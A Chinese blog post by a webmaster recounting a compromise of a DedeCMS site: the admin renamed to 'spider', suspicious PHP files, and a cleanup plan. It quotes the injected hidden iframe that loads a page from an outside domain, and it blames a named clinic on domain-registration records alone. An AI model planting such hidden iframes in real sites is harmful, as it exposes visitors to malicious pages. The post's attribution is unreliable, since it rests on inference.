今天，開啟網站後臺，輸入，帳號密碼進行登入。dede提示你的使用者名稱不存在，我就納悶了，怎麼使用者名稱就不存在了，我又沒改。我以為輸錯了，又輸入了一遍。結果還是同樣的提示你的使用者名稱不存在。好吧，既然不存在那麼我就查查是什麼原因吧。首先，上傳了dede管理員密碼重設工具，打算重置密碼，但是看到的不是我常用的賬戶名，而是一個spider的使用者名稱。如果，你看到網站後臺的管理員帳戶被給為了spider，那麼恭喜你，你遇到的問題和我今天遇到的問題是一樣一樣的。

先登入FTP，查掛馬檔案。首先在根目錄下找到了一個x.php的檔案。發現這個頁面是個亂碼，亂碼的話就說明這個檔案沒有執行，沒有執行那麼就還有掛馬檔案。繼續找，又找到了 /plus/90sec.php，大概就能判斷出來是這個檔案搗鬼的。但是我看90sec很熟的樣子，就去搜索了一下。居然是騰訊微博好友Joker(@loveyou09)，於是微博求證，得到的答案是否定的，不是他乾的。

我很想找到這個拿我站的人，於是我繼續找，我發現我的網站沒有被掛黑鏈，按說是不應該的。一個網站被拿之後，不幹點什麼，總覺得對不起自己的辛苦。我就試試看，看看到底有沒有留下點什麼。呵呵，皇天不負有心人。終於，讓我找到你。

1、在網站頭部呼叫了一個JS檔案。<script type=”text/javascript” src=”/Scripts/swfobject.js”></script>

2、這這個JS檔案裡，有一串呼叫程式碼，呼叫了非本站的頁面。<iframe src=http://www.mlwx.cc/web_admin/css/1.htm width=1 height=0></iframe>

3、去查www.mlwx.cc這個網站的備案資訊和域名註冊資訊。域名是2011年6月13日註冊的，2012年5月3日備案的。資訊全部都是無錫尚美整形美容醫院。這裡我就不再多說了，根本不用解釋。

4、去他們網站商務通留下了我的QQ，讓他們技術給我回資訊的。我放了句狠話，不加我就惡點競價。雖然這麼說，但是我可沒這麼幹，我知道大家賺錢都不容易，都是為某些企業或客戶服務，沒有必要大動干戈，以和為貴。人不犯我，我不犯人。人若犯我，呵呵，對不起，雖遠必誅！

囉嗦了這麼多，下面說下解決辦法。用工具先查網站，看看哪個檔案有漏洞。

檢測後發現，/plus/download.php這個檔案有嚴重的漏洞，個人建議直接刪除。然後，把整站下載後，重新檢查掛馬檔案，進行逐一剔除，如果有之前很早的備份那就跟好了。如果你也碰到dede後臺提示你的使用者名稱不存在，管理員被改為spider的問題，那麼就建議你要看看這篇文章了《》。